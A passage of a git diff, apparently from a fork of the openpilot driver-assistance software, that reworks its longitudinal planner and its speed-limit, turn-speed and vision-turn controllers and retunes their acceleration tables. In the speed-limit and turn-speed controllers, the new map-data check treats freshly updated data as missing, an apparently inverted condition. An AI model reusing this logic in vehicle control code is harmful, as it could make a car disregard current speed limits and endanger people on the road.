@staticmethod def parse_model(model_msg, model_error): if (len(model_msg.position.x) == 33 and - len(model_msg.velocity.x) == 33 and - len(model_msg.acceleration.x) == 33): + len(model_msg.velocity.x) == 33 and + len(model_msg.acceleration.x) == 33): x = np.interp(T_IDXS_MPC, T_IDXS, model_msg.position.x) - model_error * T_IDXS_MPC v = np.interp(T_IDXS_MPC, T_IDXS, model_msg.velocity.x) - model_error a = np.interp(T_IDXS_MPC, T_IDXS, model_msg.acceleration.x) @@ -247,43 +102,14 @@ class LongitudinalPlanner: j = np.zeros(len(T_IDXS_MPC)) return x, v, a, j - def get_df(self, v_ego): - desired_tf = T_FOLLOW - if not self.dp_e2e_adapt_fp and self.mpc.mode == 'blended': - return desired_tf - if self.dp_following_profile_ctrl: - if self.dp_following_profile == 0: - x_vel = [0, 11, 13, 15, 25, 40] - y_dist = [1.12, 1.12, 1.13, 1.12, 1.22, 1.22] - desired_tf = np.interp(v_ego, x_vel, y_dist) - elif self.dp_following_profile == 1: - x_vel = [0, 11, 13, 15, 25, 40] - y_dist = [1.5, 1.5, 1.51, 1.5, 1.5, 1.45] - desired_tf = np.interp(v_ego, x_vel, y_dist) - elif self.dp_following_profile == 2: - x_vel = [0, 11, 13, 15, 25, 40] - y_dist = [1.75, 1.75, 1.77, 1.75, 1.8, 1.8] - desired_tf = np.interp(v_ego, x_vel, y_dist) - return desired_tf - def update(self, sm): - #if self.param_read_counter % 50 == 0: - # self.read_param() - #self.param_read_counter += 1 - # dp - self.dp_accel_profile_ctrl = sm['dragonConf'].dpAccelProfileCtrl - self.dp_accel_profile = sm['dragonConf'].dpAccelProfile - self.dp_following_profile_ctrl = sm['dragonConf'].dpFollowingProfileCtrl - self.dp_following_profile = sm['dragonConf'].dpFollowingProfile - # self.get_path_length_idx(sm['modelV2'])) - dp_reset_state = False - - if sm['dragonConf'].dpE2EConditional: - self.dp_e2e_adapt_ap = sm['dragonConf'].dpE2EConditionalAdaptAp - self.dp_e2e_adapt_fp = sm['dragonConf'].dpE2EConditionalAdaptFp - dp_reset_state = self.conditional_e2e(sm) - else: - self.mpc.mode = 'blended' if sm['controlsState'].experimentalMode else 'acc' + if self.param_read_counter % 50 == 0: + self.read_param() + self.accel_controller.read_params() + self.dynamic_endtoend_controller.read_params() + self.param_read_counter += 1 + # self.mpc.mode = 'blended' if sm['controlsState'].experimentalMode else 'acc' + self.mpc.mode = self.dynamic_endtoend_controller.set_mpc_mode(self.mpc.mode, self.CP.radarUnavailable, sm['carState'], sm['radarState'].leadOne, sm['modelV2']) if sm['controlsState'].experimentalMode else 'acc' v_ego = sm['carState'].vEgo v_cruise_kph = sm['controlsState'].vCruise @@ -300,20 +126,16 @@ class LongitudinalPlanner: prev_accel_constraint = not (reset_state or sm['carState'].standstill) if self.mpc.mode == 'acc': - if self.dp_accel_profile_ctrl: - accel_limits = dp_calc_cruise_accel_limits(v_ego, self.dp_accel_profile) - else: - accel_limits = [A_CRUISE_MIN, get_max_accel(v_ego)] + accel_limits = [A_CRUISE_MIN, get_max_accel(v_ego)] accel_limits_turns = limit_accel_in_turns(v_ego, sm['carState'].steeringAngleDeg, accel_limits, self.CP) else: - if sm['dragonConf'].dpE2EConditional and sm['dragonConf'].dpE2EConditionalAdaptAp and self.dp_accel_profile_ctrl: - _, accel_max = dp_calc_cruise_accel_limits(v_ego, self.dp_accel_profile) - accel_limits = [MIN_ACCEL, accel_max] - else: - accel_limits = [MIN_ACCEL, MAX_ACCEL] + accel_limits = [MIN_ACCEL, MAX_ACCEL] accel_limits_turns = [MIN_ACCEL, MAX_ACCEL] - if reset_state or dp_reset_state: + # dp - override accel using dp_long_accel_profile + accel_limits = self.accel_controller.get_accel_limits(v_ego, accel_limits) + + if reset_state: self.v_desired_filter.x = v_ego # Clip aEgo to cruise limits to prevent large accelerations when becoming active self.a_desired = clip(sm['carState'].aEgo, accel_limits[0], accel_limits[1]) @@ -326,20 +148,17 @@ class LongitudinalPlanner: # Get acceleration and active solutions for custom long mpc. self.cruise_source, a_min_sol, v_cruise_sol = self.cruise_solutions(not reset_state, self.v_desired_filter.x, self.a_desired, v_cruise, sm) - if force_slow_decel: v_cruise_sol = 0.0 # clip limits, cannot init MPC outside of bounds accel_limits_turns[0] = min(accel_limits_turns[0], self.a_desired + 0.05, a_min_sol) accel_limits_turns[1] = max(accel_limits_turns[1], self.a_desired - 0.05) - # dp - mpc.set_weights calls moved to mpc.update function because we need lead0 and lead1 data - #self.mpc.set_weights(prev_accel_constraint) + self.mpc.set_weights(prev_accel_constraint, personality=self.personality) self.mpc.set_accel_limits(accel_limits_turns[0], accel_limits_turns[1]) self.mpc.set_cur_state(self.v_desired_filter.x, self.a_desired) x, v, a, j = self.parse_model(sm['modelV2'], self.v_model_error) - self.dp_e2e_tf = self.get_df(v_ego) - self.mpc.update(sm['radarState'], v_cruise_sol, x, v, a, j, prev_accel_constraint, self.dp_e2e_tf) + self.mpc.update(sm['radarState'], v_cruise_sol, x, v, a, j, personality=self.personality, use_df_tune=self.dp_long_use_df_tune) self.v_desired_trajectory_full = np.interp(T_IDXS, T_IDXS_MPC, self.mpc.v_solution) self.a_desired_trajectory_full = np.interp(T_IDXS, T_IDXS_MPC, self.mpc.a_solution) @@ -351,8 +170,6 @@ class LongitudinalPlanner: self.fcw = self.mpc.crash_cnt > 2 and not sm['carState'].standstill if self.fcw: cloudlog.info("FCW triggered") - if sm['dragonConf'].dpE2EConditional: - self._set_dp_e2e_mode('blended', True) # Interpolate 0.05 seconds and save as starting point for next iteration a_prev = self.a_desired @@ -373,36 +190,43 @@ class LongitudinalPlanner: longitudinalPlan.jerks = self.j_desired_trajectory.tolist() longitudinalPlan.hasLead = sm['radarState'].leadOne.status - longitudinalPlan.longitudinalPlanSource = self.mpc.source if self.mpc.source != 'cruise' else self.cruise_source + longitudinalPlan.longitudinalPlanSource = self.mpc.source longitudinalPlan.fcw = self.fcw longitudinalPlan.solverExecutionTime = self.mpc.solve_time - #longitudinalPlan.personality = self.personality - - longitudinalPlan.visionTurnControllerState = self.vision_turn_controller.state - longitudinalPlan.visionTurnSpeed = float(self.vision_turn_controller.v_turn) - - longitudinalPlan.speedLimitControlState = self.speed_limit_controller.state - longitudinalPlan.speedLimit = float(self.speed_limit_controller.speed_limit) - longitudinalPlan.speedLimitOffset = float(self.speed_limit_controller.speed_limit_offset) - longitudinalPlan.distToSpeedLimit = float(self.speed_limit_controller.distance) - longitudinalPlan.isMapSpeedLimit = bool(self.speed_limit_controller.source == SpeedLimitResolver.Source.map_data) - longitudinalPlan.eventsDEPRECATED = self.events.to_msg() - - longitudinalPlan.turnSpeedControlState = self.turn_speed_controller.state - longitudinalPlan.turnSpeed = float(self.turn_speed_controller.speed_limit) - longitudinalPlan.distToTurn = float(self.turn_speed_controller.distance) - longitudinalPlan.turnSign = int(self.turn_speed_controller.turn_sign) - - longitudinalPlan.dpE2EIsBlended = self.mpc.mode == 'blended' + longitudinalPlan.personality = self.personality pm.send('longitudinalPlan', plan_send) + # dp - extension + plan_ext_send = messaging.new_message('longitudinalPlanExt') + + longitudinalPlanExt = plan_ext_send.longitudinalPlanExt + + longitudinalPlanExt.visionTurnControllerState = self.vision_turn_controller.state + longitudinalPlanExt.visionTurnSpeed = float(self.vision_turn_controller.v_turn) + + longitudinalPlanExt.speedLimitControlState = self.speed_limit_controller.state + longitudinalPlanExt.speedLimit = float(self.speed_limit_controller.speed_limit) + longitudinalPlanExt.speedLimitOffset = float(self.speed_limit_controller.speed_limit_offset) + longitudinalPlanExt.distToSpeedLimit = float(self.speed_limit_controller.distance) + longitudinalPlanExt.isMapSpeedLimit = bool(self.speed_limit_controller.source == SpeedLimitResolver.Source.map_data) + + longitudinalPlanExt.turnSpeedControlState = self.turn_speed_controller.state + longitudinalPlanExt.turnSpeed = float(self.turn_speed_controller.speed_limit) + longitudinalPlanExt.distToTurn = float(self.turn_speed_controller.distance) + longitudinalPlanExt.turnSign = int(self.turn_speed_controller.turn_sign) + + longitudinalPlanExt.dpE2EIsBlended = self.mpc.mode == 'blended' + + longitudinalPlanExt.longitudinalPlanExtSource = self.mpc.source if self.mpc.source != 'cruise' else self.cruise_source + pm.send('longitudinalPlanExt', plan_ext_send) + + # mapd def cruise_solutions(self, enabled, v_ego, a_ego, v_cruise, sm): # Update controllers self.vision_turn_controller.update(enabled, v_ego, a_ego, v_cruise, sm) - self.events = Events() - self.speed_limit_controller.update(enabled, v_ego, a_ego, sm, v_cruise, self.events) + self.speed_limit_controller.update(enabled, v_ego, a_ego, v_cruise, sm['carState'].gasPressed) self.turn_speed_controller.update(enabled, v_ego, a_ego, sm) # Pick solution with lowest velocity target. diff --git a/selfdrive/controls/lib/radar_helpers.py b/selfdrive/controls/lib/radar_helpers.py deleted file mode 100644 index 4184340dc..000000000 --- a/selfdrive/controls/lib/radar_helpers.py +++ /dev/null @@ -1,159 +0,0 @@ -from common.numpy_fast import mean -from common.kalman.simple_kalman import KF1D - - -# Default lead acceleration decay set to 50% at 1s -_LEAD_ACCEL_TAU = 1.5 - -# radar tracks -SPEED, ACCEL = 0, 1 # Kalman filter states enum - -# stationary qualification parameters -v_ego_stationary = 4. # no stationary object flag below this speed - -RADAR_TO_CENTER = 2.7 # (deprecated) RADAR is ~ 2.7m ahead from center of car -RADAR_TO_CAMERA = 1.52 # RADAR is ~ 1.5m ahead from center of mesh frame - -class Track(): - def __init__(self, v_lead, kalman_params): - self.cnt = 0 - self.aLeadTau = _LEAD_ACCEL_TAU - self.K_A = kalman_params.A - self.K_C = kalman_params.C - self.K_K = kalman_params.K - self.kf = KF1D([[v_lead], [0.0]], self.K_A, self.K_C, self.K_K) - - def update(self, d_rel, y_rel, v_rel, v_lead, measured): - # relative values, copy - self.dRel = d_rel # LONG_DIST - self.yRel = y_rel # -LAT_DIST - self.vRel = v_rel # REL_SPEED - self.vLead = v_lead - self.measured = measured # measured or estimate - - # computed velocity and accelerations - if self.cnt > 0: - self.kf.update(self.vLead) - - self.vLeadK = float(self.kf.x[SPEED][0]) - self.aLeadK = float(self.kf.x[ACCEL][0]) - - # Learn if constant acceleration - if abs(self.aLeadK) < 0.5: - self.aLeadTau = _LEAD_ACCEL_TAU - else: - self.aLeadTau *= 0.9 - - self.cnt += 1 - - def get_key_for_cluster(self): - # Weigh y higher since radar is inaccurate in this dimension - return [self.dRel, self.yRel*2, self.vRel] - - def reset_a_lead(self, aLeadK, aLeadTau): - self.kf = KF1D([[self.vLead], [aLeadK]], self.K_A, self.K_C, self.K_K) - self.aLeadK = aLeadK - self.aLeadTau = aLeadTau - - -class Cluster(): - def __init__(self): - self.tracks = set() - - def add(self, t): - # add the first track - self.tracks.add(t) - - # TODO: make generic - @property - def dRel(self): - return mean([t.dRel for t in self.tracks]) - - @property - def yRel(self): - return mean([t.yRel for t in self.tracks]) - - @property - def vRel(self): - return mean([t.vRel for t in self.tracks]) - - @property - def aRel(self): - return mean([t.aRel for t in self.tracks]) - - @property - def vLead(self): - return mean([t.vLead for t in self.tracks]) - - @property - def dPath(self): - return mean([t.dPath for t in self.tracks]) - - @property - def vLat(self): - return mean([t.vLat for t in self.tracks]) - - @property - def vLeadK(self): - return mean([t.vLeadK for t in self.tracks]) - - @property - def aLeadK(self): - if all(t.cnt <= 1 for t in self.tracks): - return 0. - else: - return mean([t.aLeadK for t in self.tracks if t.cnt > 1]) - - @property - def aLeadTau(self): - if all(t.cnt <= 1 for t in self.tracks): - return _LEAD_ACCEL_TAU - else: - return mean([t.aLeadTau for t in self.tracks if t.cnt > 1]) - - @property - def measured(self): - return any(t.measured for t in self.tracks) - - def get_RadarState(self, model_prob=0.0): - return { - "dRel": float(self.dRel), - "yRel": float(self.yRel), - "vRel": float(self.vRel), - "vLead": float(self.vLead), - "vLeadK": float(self.vLeadK), - "aLeadK": float(self.aLeadK), - "status": True, - "fcw": self.is_potential_fcw(model_prob), - "modelProb": model_prob, - "radar": True, - "aLeadTau": float(self.aLeadTau) - } - - def get_RadarState_from_vision(self, lead_msg, v_ego, model_v_ego): - lead_v_rel_pred = lead_msg.v[0] - model_v_ego - return { - "dRel": float(lead_msg.x[0] - RADAR_TO_CAMERA), - "yRel": float(-lead_msg.y[0]), - "vRel": float(lead_v_rel_pred), - "vLead": float(v_ego + lead_v_rel_pred), - "vLeadK": float(v_ego + lead_v_rel_pred), - "aLeadK": 0.0, - "aLeadTau": 0.3, - "fcw": False, - "modelProb": float(lead_msg.prob), - "radar": False, - "status": True - } - - def __str__(self): - ret = f"x: {self.dRel:4.1f} y: {self.yRel:4.1f} v: {self.vRel:4.1f} a: {self.aLeadK:4.1f}" - return ret - - def potential_low_speed_lead(self, v_ego): - # stop for stuff in front of you and low speed, even without model confirmation - # Radar points closer than 0.75, are almost always glitches on toyota radars - return abs(self.yRel) < 1.0 and (v_ego < v_ego_stationary) and (0.75 < self.dRel < 25) - - def is_potential_fcw(self, model_prob): - return model_prob > .9 diff --git a/selfdrive/controls/lib/speed_limit_controller.py b/selfdrive/controls/lib/speed_limit_controller.py index 734dcb8fe..36dde54f8 100644 --- a/selfdrive/controls/lib/speed_limit_controller.py +++ b/selfdrive/controls/lib/speed_limit_controller.py @@ -2,23 +2,24 @@ import numpy as np import time from common.numpy_fast import interp from enum import IntEnum -from cereal import log, car +from cereal import custom, car from common.params import Params from common.realtime import sec_since_boot from selfdrive.controls.lib.drive_helpers import LIMIT_ADAPT_ACC, LIMIT_MIN_ACC, LIMIT_MAX_ACC, LIMIT_SPEED_OFFSET_TH, \ LIMIT_MAX_MAP_DATA_AGE, CONTROL_N -from selfdrive.controls.lib.events import Events +# from selfdrive.controls.lib.events import Events from selfdrive.modeld.constants import T_IDXS +import cereal.messaging as messaging _PARAMS_UPDATE_PERIOD = 2. # secs. Time between parameter updates. _TEMP_INACTIVE_GUARD_PERIOD = 1. # secs. Time to wait after activation before considering temp deactivation signal. # Lookup table for speed limit percent offset depending on speed. -_LIMIT_PERC_OFFSET_V = [ 0.0, 0.1, 0.14, 0.11, 0.2, 0.18, 0.17, 0.14, 0.065, 0.0] # 20, 33, 40, 50, 65, 75, 80, 80, 80 mph -_LIMIT_PERC_OFFSET_BP = [11.0, 13.4, 15.6, 20.1, 22.3, 24.58, 29.0, 31.2, 33.4, 35.7] # 20, 30, 35, 45, 55, 65, 70, 75, 80 mph +_LIMIT_PERC_OFFSET_V = [0.1, 0.05, 0.038] # 55, 105, 135 km/h +_LIMIT_PERC_OFFSET_BP = [13.9, 27.8, 36.1] # 50, 100, 130 km/h -SpeedLimitControlState = log.LongitudinalPlan.SpeedLimitControlState +SpeedLimitControlState = custom.LongitudinalPlanExt.SpeedLimitControlState EventName = car.CarEvent.EventName _DEBUG = False @@ -46,7 +47,6 @@ class SpeedLimitResolver(): none = 0 car_state = 1 map_data = 2 - #nav = 3 class Policy(IntEnum): car_state_only = 0 @@ -54,10 +54,8 @@ class SpeedLimitResolver(): car_state_priority = 2 map_data_priority = 3 combined = 4 - #nav_only = 5 - #nav_priority = 6 - def __init__(self, policy=Policy.map_data_priority):#.nav_priority): + def __init__(self, policy=Policy.map_data_priority): self._limit_solutions = {} # Store for speed limit solutions from different sources self._distance_solutions = {} # Store for distance to current speed limit start for different sources self._v_ego = 0. @@ -67,52 +65,34 @@ class SpeedLimitResolver(): self.speed_limit = 0. self.distance = 0. self.source = SpeedLimitResolver.Source.none + self._sm = messaging.SubMaster(['liveMapData']) - def resolve(self, v_ego, current_speed_limit, sm): + def resolve(self, v_ego, current_speed_limit): self._v_ego = v_ego self._current_speed_limit = current_speed_limit - self._sm = sm + # self._sm = sm - self._get_from_car_state() - #self._get_from_nav() + # self._get_from_car_state() self._get_from_map_data() self._consolidate() return self.speed_limit, self.distance, self.source - def _get_from_car_state(self): - self._limit_solutions[SpeedLimitResolver.Source.car_state] = self._sm['carState'].cruiseState.speedLimit - self._distance_solutions[SpeedLimitResolver.Source.car_state] = 0. - - #def _get_from_nav(self): - # Ignore if nav instruction is not alive - #if not self._sm.alive['navInstruction']: - # self._limit_solutions[SpeedLimitResolver.Source.nav] = 0. - # self._distance_solutions[SpeedLimitResolver.Source.nav] = 0. - # _debug('SL: No nav instruction for speed limit') - # return - - # Load limits from nav instruction - #self._limit_solutions[SpeedLimitResolver.Source.nav] = self._sm['navInstruction'].speedLimit - #self._distance_solutions[SpeedLimitResolver.Source.nav] = 0. - + # def _get_from_car_state(self): + # self._limit_solutions[SpeedLimitResolver.Source.car_state] = self._sm['carState'].cruiseState.speedLimit + # self._distance_solutions[SpeedLimitResolver.Source.car_state] = 0. + # def _get_from_map_data(self): # Ignore if no live map data - sock = 'liveMapData' - if self._sm.logMonoTime[sock] is None: + self._sm.update(0) + if self._sm.updated['liveMapData']: self._limit_solutions[SpeedLimitResolver.Source.map_data] = 0. self._distance_solutions[SpeedLimitResolver.Source.map_data] = 0. _debug('SL: No map data for speed limit') return - #if not self._sm.updated[sock]: - # self._limit_solutions[SpeedLimitResolver.Source.map_data] = 0. - # self._distance_solutions[SpeedLimitResolver.Source.map_data] = 0. - # _debug('SL: not updated, mapd crashed?') - # return - # Load limits from map_data - map_data = self._sm[sock] + map_data = self._sm['liveMapData'] speed_limit = map_data.speedLimit if map_data.speedLimitValid else 0. next_speed_limit = map_data.speedLimitAhead if map_data.speedLimitAheadValid else 0. @@ -167,19 +147,12 @@ class SpeedLimitResolver(): distances = np.array([], dtype=float) sources = np.array([], dtype=int) - if self._policy == SpeedLimitResolver.Policy.car_state_only or \ - self._policy == SpeedLimitResolver.Policy.car_state_priority or \ - self._policy == SpeedLimitResolver.Policy.combined: - limits = np.append(limits, self._limit_solutions[SpeedLimitResolver.Source.car_state]) - distances = np.append(distances, self._distance_solutions[SpeedLimitResolver.Source.car_state]) - sources = np.append(sources, SpeedLimitResolver.Source.car_state.value) - - #if self._policy == SpeedLimitResolver.Policy.nav_only or \ - # self._policy == SpeedLimitResolver.Policy.nav_priority or \ - # self._policy == SpeedLimitResolver.Policy.combined: - # limits = np.append(limits, self._limit_solutions[SpeedLimitResolver.Source.nav]) - # distances = np.append(distances, self._distance_solutions[SpeedLimitResolver.Source.nav]) - # sources = np.append(sources, SpeedLimitResolver.Source.nav.value) + # if self._policy == SpeedLimitResolver.Policy.car_state_only or \ + # self._policy == SpeedLimitResolver.Policy.car_state_priority or \ + # self._policy == SpeedLimitResolver.Policy.combined: + # limits = np.append(limits, self._limit_solutions[SpeedLimitResolver.Source.car_state]) + # distances = np.append(distances, self._distance_solutions[SpeedLimitResolver.Source.car_state]) + # sources = np.append(sources, SpeedLimitResolver.Source.car_state.value) if self._policy == SpeedLimitResolver.Policy.map_data_only or \ self._policy == SpeedLimitResolver.Policy.map_data_priority or \ @@ -188,26 +161,16 @@ class SpeedLimitResolver(): distances = np.append(distances, self._distance_solutions[SpeedLimitResolver.Source.map_data]) sources = np.append(sources, SpeedLimitResolver.Source.map_data.value) - if np.amax(limits) == 0.: - if self._policy == SpeedLimitResolver.Policy.car_state_priority: - limits = np.append(limits, self._limit_solutions[SpeedLimitResolver.Source.map_data]) - distances = np.append(distances, self._distance_solutions[SpeedLimitResolver.Source.map_data]) - sources = np.append(sources, SpeedLimitResolver.Source.map_data.value) - - elif self._policy == SpeedLimitResolver.Policy.map_data_priority: - limits = np.append(limits, self._limit_solutions[SpeedLimitResolver.Source.car_state]) - distances = np.append(distances, self._distance_solutions[SpeedLimitResolver.Source.car_state]) - sources = np.append(sources, SpeedLimitResolver.Source.car_state.value) - - #elif self._policy == SpeedLimitResolver.Policy.nav_priority: - #limits = np.append(limits, self._limit_solutions[SpeedLimitResolver.Source.map_data]) - #distances = np.append(distances, self._distance_solutions[SpeedLimitResolver.Source.map_data]) - #sources = np.append(sources, SpeedLimitResolver.Source.map_data.value) - - #if np.amax(limits) == 0.: - # limits = np.append(limits, self._limit_solutions[SpeedLimitResolver.Source.car_state]) - # distances = np.append(distances, self._distance_solutions[SpeedLimitResolver.Source.car_state]) - # sources = np.append(sources, SpeedLimitResolver.Source.car_state.value) + # if np.amax(limits) == 0.: + # if self._policy == SpeedLimitResolver.Policy.car_state_priority: + # limits = np.append(limits, self._limit_solutions[SpeedLimitResolver.Source.map_data]) + # distances = np.append(distances, self._distance_solutions[SpeedLimitResolver.Source.map_data]) + # sources = np.append(sources, SpeedLimitResolver.Source.map_data.value) + # + # elif self._policy == SpeedLimitResolver.Policy.map_data_priority: + # limits = np.append(limits, self._limit_solutions[SpeedLimitResolver.Source.car_state]) + # distances = np.append(distances, self._distance_solutions[SpeedLimitResolver.Source.car_state]) + # sources = np.append(sources, SpeedLimitResolver.Source.car_state.value) # Get all non-zero values and set the minimum if any, otherwise 0. mask = limits > 0. @@ -235,8 +198,8 @@ class SpeedLimitController(): self._last_params_update = 0.0 self._last_op_enabled_time = 0.0 self._is_metric = self._params.get_bool("IsMetric") - self._is_enabled = self._params.get_bool("SpeedLimitControl") - self._offset_enabled = self._params.get_bool("SpeedLimitPercOffset") + self._is_enabled = self._params.get_bool("dp_mapd") and self._params.get_bool("dp_mapd_speed_limit_control") + self._offset_enabled = False #self._params.get_bool("SpeedLimitPercOffset") self._op_enabled = False self._op_enabled_prev = False self._v_ego = 0. @@ -301,13 +264,13 @@ class SpeedLimitController(): def source(self): return self._source - def _update_params(self): - time = sec_since_boot() - if time > self._last_params_update + _PARAMS_UPDATE_PERIOD: - self._is_enabled = self._params.get_bool("SpeedLimitControl") - self._offset_enabled = self._params.get_bool("SpeedLimitPercOffset") - _debug(f'Updated Speed limit params. enabled: {self._is_enabled}, with offset: {self._offset_enabled}') - self._last_params_update = time + # def _update_params(self): + # time = sec_since_boot() + # if time > self._last_params_update + _PARAMS_UPDATE_PERIOD: + # self._is_enabled = True #self._params.get_bool("SpeedLimitControl") + # self._offset_enabled = False #self._params.get_bool("SpeedLimitPercOffset") + # _debug(f'Updated Speed limit params. enabled: {self._is_enabled}, with offset: {self._offset_enabled}') + # self._last_params_update = time def _update_calculations(self): # Update current velocity offset (error) @@ -390,27 +353,27 @@ class SpeedLimitController(): # Keep solution limited. self._a_target = np.clip(a_target, LIMIT_MIN_ACC, LIMIT_MAX_ACC) - def _update_events(self, events): - if not self.is_active: - # no event while inactive - return + # def _update_events(self, events): + # if not self.is_active: + # # no event while inactive + # return + # + # if self._state_prev <= SpeedLimitControlState.tempInactive: + # events.add(EventName.speedLimitActive) + # elif self._speed_limit_changed != 0: + # events.add(EventName.speedLimitValueChange) - if self._state_prev <= SpeedLimitControlState.tempInactive: - events.add(EventName.speedLimitActive) - elif self._speed_limit_changed != 0: - events.add(EventName.speedLimitValueChange) - - def update(self, enabled, v_ego, a_ego, sm, v_cruise_setpoint, events=Events()): + def update(self, enabled, v_ego, a_ego, v_cruise_setpoint, gas_pressed): #, events=Events()): self._op_enabled = enabled self._v_ego = v_ego self._a_ego = a_ego self._v_cruise_setpoint = v_cruise_setpoint - self._gas_pressed = sm['carState'].gasPressed + self._gas_pressed = gas_pressed - self._speed_limit, self._distance, self._source = self._resolver.resolve(v_ego, self.speed_limit, sm) + self._speed_limit, self._distance, self._source = self._resolver.resolve(v_ego, self.speed_limit) - self._update_params() + # self._update_params() self._update_calculations() self._state_transition() self._update_solution() - self._update_events(events) + # self._update_events(events) diff --git a/selfdrive/controls/lib/turn_speed_controller.py b/selfdrive/controls/lib/turn_speed_controller.py index a98b34a78..47c9b2f72 100644 --- a/selfdrive/controls/lib/turn_speed_controller.py +++ b/selfdrive/controls/lib/turn_speed_controller.py @@ -1,11 +1,12 @@ import numpy as np import time from common.params import Params -from cereal import log -from common.realtime import sec_since_boot +from cereal import custom +# from common.realtime import sec_since_boot from selfdrive.controls.lib.drive_helpers import LIMIT_ADAPT_ACC, LIMIT_MIN_SPEED, LIMIT_MAX_MAP_DATA_AGE, \ LIMIT_SPEED_OFFSET_TH, CONTROL_N, LIMIT_MIN_ACC, LIMIT_MAX_ACC from selfdrive.modeld.constants import T_IDXS +import cereal.messaging as messaging _ACTIVE_LIMIT_MIN_ACC = -0.5 # m/s^2 Maximum deceleration allowed while active. @@ -14,7 +15,7 @@ _ACTIVE_LIMIT_MAX_ACC = 0.5 # m/s^2 Maximum acelration allowed while active. _DEBUG = False -TurnSpeedControlState = log.LongitudinalPlan.SpeedLimitControlState +TurnSpeedControlState = custom.LongitudinalPlanExt.SpeedLimitControlState def _debug(msg): @@ -38,7 +39,7 @@ class TurnSpeedController(): def __init__(self): self._params = Params() self._last_params_update = 0. - self._is_enabled = self._params.get_bool("TurnSpeedControl") + self._is_enabled = self._params.get_bool("dp_mapd_turn_speed_control") self._op_enabled = False self._v_ego = 0. self._a_ego = 0. @@ -54,6 +55,8 @@ class TurnSpeedController(): self._next_speed_limit_prev = 0. self._a_target = 0. + self._gas_pressed = False + self._sm = messaging.SubMaster(['liveMapData']) @property def a_target(self): @@ -95,21 +98,18 @@ class TurnSpeedController(): def turn_sign(self): return self._turn_sign - def _get_limit_from_map_data(self, sm): + def _get_limit_from_map_data(self): """Provides the speed limit, distance and turn sign to it for turns based on map data. """ # Ignore if no live map data - sock = 'liveMapData' - if sm.logMonoTime[sock] is None: + # sock = 'liveMapData' + self._sm.update(0) + if self._sm.updated['liveMapData']: _debug('TS: No map data for turn speed limit') return 0., 0., 0 - #if not sm.updated[sock]: - # _debug('TS: not updated, mapd crashed?') - # return 0., 0., 0 - # Load map_data and initialize - map_data = sm[sock] + map_data = self._sm['liveMapData'] speed_limit = 0. # Calculate the age of the gps fix. Ignore if too old. @@ -166,17 +166,17 @@ class TurnSpeedController(): # Otherwise we just provide the calculated speed_limit return speed_limit, 0., turn_sign - def _update_params(self): - time = sec_since_boot() - if time > self._last_params_update + 5.0: - self._is_enabled = self._params.get_bool("TurnSpeedControl") - self._last_params_update = time + # def _update_params(self): + # time = sec_since_boot() + # if time > self._last_params_update + 5.0: + # self._is_enabled = True #self._params.get_bool("TurnSpeedControl") + # self._last_params_update = time def _update_calculations(self): # Update current velocity offset (error) self._v_offset = self.speed_limit - self._v_ego - def _state_transition(self, sm): + def _state_transition(self): # In any case, if op is disabled, or turn speed limit control is disabled # or the reported speed limit is 0, deactivate. if not self._op_enabled or not self._is_enabled or self.speed_limit == 0.: @@ -185,7 +185,7 @@ class TurnSpeedController(): # In any case, we deactivate the speed limit controller temporarily # if gas is pressed (to support gas override implementations). - if sm['carState'].gasPressed: + if self._gas_pressed: self.state = TurnSpeedControlState.tempInactive return @@ -234,15 +234,16 @@ class TurnSpeedController(): # update solution values. self._a_target = a_target - def update(self, enabled, v_ego, a_ego, sm): + def update(self, enabled, v_ego, a_ego, gas_pressed): self._op_enabled = enabled self._v_ego = v_ego self._a_ego = a_ego + self._gas_pressed = gas_pressed # Get the speed limit from Map Data - self._speed_limit, self._distance, self._turn_sign = self._get_limit_from_map_data(sm) + self._speed_limit, self._distance, self._turn_sign = self._get_limit_from_map_data() - self._update_params() + # self._update_params() self._update_calculations() - self._state_transition(sm) + self._state_transition() self._update_solution() diff --git a/selfdrive/controls/lib/vision_turn_controller.py b/selfdrive/controls/lib/vision_turn_controller.py index 874c85361..2ec1720ad 100644 --- a/selfdrive/controls/lib/vision_turn_controller.py +++ b/selfdrive/controls/lib/vision_turn_controller.py @@ -1,14 +1,15 @@ import numpy as np import math -from cereal import log +from cereal import custom from common.numpy_fast import interp from common.params import Params -from common.realtime import sec_since_boot +# from common.realtime import sec_since_boot from common.conversions import Conversions as CV -from selfdrive.controls.lib.lateral_planner import TRAJECTORY_SIZE +# from selfdrive.controls.lib.lane_planner import TRAJECTORY_SIZE from selfdrive.controls.lib.drive_helpers import V_CRUISE_MAX +import cereal.messaging as messaging - +TRAJECTORY_SIZE = 33 _MIN_V = 5.6 # Do not operate under 20km/h _ENTERING_PRED_LAT_ACC_TH = 1.3 # Predicted Lat Acc threshold to trigger entering turn state. @@ -30,13 +31,13 @@ _NO_OVERSHOOT_TIME_HORIZON = 4. # s. Time to use for velocity desired based on # Lookup table for the minimum smooth deceleration during the ENTERING state # depending on the actual maximum absolute lateral acceleration predicted on the turn ahead. -_ENTERING_SMOOTH_DECEL_V = [-0.2, -0.5] # min decel value allowed on ENTERING state +_ENTERING_SMOOTH_DECEL_V = [-0.2, -1.] # min decel value allowed on ENTERING state _ENTERING_SMOOTH_DECEL_BP = [1.3, 3.] # absolute value of lat acc ahead # Lookup table for the acceleration for the TURNING state # depending on the current lateral acceleration of the vehicle. -_TURNING_ACC_V = [1.2, 0.94, 0.9, 0.8, -0.1] # acc value -_TURNING_ACC_BP = [1.5, 10, 12, 14, 16] # absolute value of current lat acc +_TURNING_ACC_V = [0.5, 0., -0.4] # acc value +_TURNING_ACC_BP = [1.5, 2.3, 3.] # absolute value of current lat acc _LEAVING_ACC = 0.5 # Confortble acceleration to regain speed while leaving a turn. @@ -51,7 +52,7 @@ def _debug(msg): print(msg) -VisionTurnControllerState = log.LongitudinalPlan.VisionTurnControllerState +VisionTurnControllerState = custom.LongitudinalPlanExt.VisionTurnControllerState def eval_curvature(poly, x_vals): @@ -97,7 +98,7 @@ class VisionTurnController(): self._CP = CP self._op_enabled = False self._gas_pressed = False - self._is_enabled = self._params.get_bool("TurnVisionControl") + self._is_enabled = self._params.get_bool("dp_mapd") and self._params.get_bool("dp_mapd_turn_vision_control") self._last_params_update = 0. self._v_cruise_setpoint = 0. self._v_ego = 0. @@ -105,6 +106,7 @@ class VisionTurnController(): self._a_target = 0. self._v_overshoot = 0. self._state = VisionTurnControllerState.disabled + self._sm = messaging.SubMaster(['lateralPlanExt']) self._reset() @@ -142,17 +144,16 @@ class VisionTurnController(): self._v_overshoot_distance = 200. self._lat_acc_overshoot_ahead = False - def _update_params(self): - time = sec_since_boot() - if time > self._last_params_update + 5.0: - 